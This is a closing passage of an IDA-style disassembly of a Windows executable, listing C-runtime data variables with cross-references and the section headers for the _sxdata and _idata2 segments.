dd 20202000h, 20202020h, 20h
dword_4DD364 dd 0 ; DATA XREF: __setmbcp+6E�w
; __setmbcp+12B�w ...
dword_4DD368 dd 0 ; DATA XREF: ___sbh_heap_init+3C�w
; ___sbh_alloc_new_region+5�r ...
dword_4DD36C dd 0 ; DATA XREF: sub_41E742+23A�r
; sub_41E742+25A�r ...
dword_4DD370 dd 0 ; DATA XREF: ___sbh_heap_init+31�w
; sub_41E742+311�w ...
; void *Dst
Dst dd 0 ; DATA XREF: ___sbh_heap_init+21�w
; sub_41E742+22D�r ...
dword_4DD378 dd 0 ; DATA XREF: ___sbh_heap_init+28�w
; ___sbh_find_block�r ...
dword_4DD37C dd 0 ; DATA XREF: ___sbh_heap_init+15�w
; ___sbh_find_block+8�r ...
dword_4DD380 dd 0 ; DATA XREF: sub_41BBE2+5C�r
; sub_41BEF3+F�r ...
dword_4DD384 dd 340000h ; DATA XREF: sub_41BA91+5A�r
; sub_41BBE2+C0�r ...
dword_4DD388 dd 1 ; DATA XREF: sub_41BA91+C�r
; sub_41BBE2:loc_41BC12�r ...
dword_4DD38C dd 142340h ; DATA XREF: start+7A�w __wincmdln+F�r ...
dword_4DD390 dd 1 ; DATA XREF: __setenvp+AD�w
dword_4DD394 dd 1 ; DATA XREF: ___initmbctable�r
; ___initmbctable+11�w ...
dword_4DD398 dd 34075Ch ; DATA XREF: _doexit+3E�r __onexit+13�r ...
; void *dword_4DD39C
dword_4DD39C dd 340758h ; DATA XREF: _doexit+35�r _doexit+57�r ...
_data ends
; Section 4. (virtual address 000DE000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000018 ( 24.)
; Offset to raw data for section: 000DE000
; Flags C0000240: Data Comment Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_sxdata segment para public 'DATA' use32
assume cs:_sxdata
;org 4DE000h
dd 127h, 19Ch, 1DCh, 221h, 233h, 290h
_sxdata ends
; Section 5. (virtual address 000DF000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 000DE200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 4DF000h
align 2000h
_idata2 ends
end start